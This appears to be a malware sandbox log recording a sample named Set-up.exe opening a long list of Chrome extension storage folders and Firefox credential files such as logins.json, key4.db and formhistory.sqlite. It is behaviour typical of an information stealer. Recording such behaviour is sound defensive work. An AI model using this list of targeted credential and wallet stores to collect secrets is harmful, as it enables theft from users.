Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kfdniefadaanbjodldohaedphafoffoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckdjpkejmlgmanmmdfeimelghmdfeobe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibegklajigjlbljkhfpenpfoadebkokl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onapnnfmpjmbmdcipllnjmjdjfonfjdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iokeahhehimjnekafflcihljlcjccdbe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmmkllgcgpldbblpnhghdojehhfafhro	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdpelninpfbopdfbppfopcmoepikkgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfdldlejlcgbgollnbonjgladpgeogab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\enabgbdfcbaehmbigakijjabdpdnimlg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ekkhlihjnlmjenikbgmhgjkknoelfped	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilbibkgkmlkhgnpgflcjdfefbkpehoom	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odpnjmimokcmjgojhnhfcnalnegdjmdn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\apbldaphppcdfbdnnogdikheafliigcf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnefghmjgbmpkjjfhefnenfnejdjneog	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nebnhfamliijlghikdgcigoebonmoibm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkhmbjifakpikpapdiaepgkdephjgnma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ablbagjepecncofimgjmdpnhnfjiecfm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ogphgbfmhodmnmpnaadpbdadldbnmjji	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fpcamiejgfmmhnhbcafmnefbijblinff	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjhohodkpobnogbepojmopnaninookhj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egdddjbjlcjckiejbbaneobkpgnmpknp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nofkfblpeailgignhkbnapbephdnmbmn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bopcbmipnjdcdfflfgjdgdjejmgpoaab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klghhnkeealcohjjanjjdaeeggmfmlpl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nihlebdlccjjdejgocpogfpheakkpodb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jngbikilcgcnfdbmnmnmnleeomffciml	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lnnnmfcpbkafcpgdilckhmhbkkbpkmid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjagdglgahihloifacmhaigjnkobnnih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jfdlamikmbghhapbgfoogdffldioobgl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lfochlioelphaglamdcakfjemolpichk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdgbckgdncnhihllonhnjbdoighgpimk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bifidjkcdpgfnlbcjpdkdcnbiooooblg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijpdbdidkomoophdnnnfoancpbbmpfcn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key3.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iodngkohgeogpicpibpnaofoeifknfdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpmkedoipcpimgecpmgpldfpohjplkpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmglflngjlhgibbmcedpdabjmcmboamo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ljfpcifpgbbchoddpjefaipoiigpdmag	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldpmmllpgnfdjkmhcficcifgoeopnodc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kglcipoddmbniebnibibkghfijekllbl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mjdmgoiobnbombmnbbdllfncjcmopfnc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfhdojbkjhnklbpkdaibdccddilifddb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\njojblnpemjkgkchnpbfllpofaphbokk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mbcafoimmibpjgdjboacfhkijdkmjocd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmphdnilpmdejikjdnlbcnmnabepfgkh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmjmllblpcbmniokccdoaiahcdajdjof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hhmkpbimapjpajpicehcnmhdgagpfmjc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmhjnpmdlhokfidldlglfhkkfhjdmhgl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhcc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
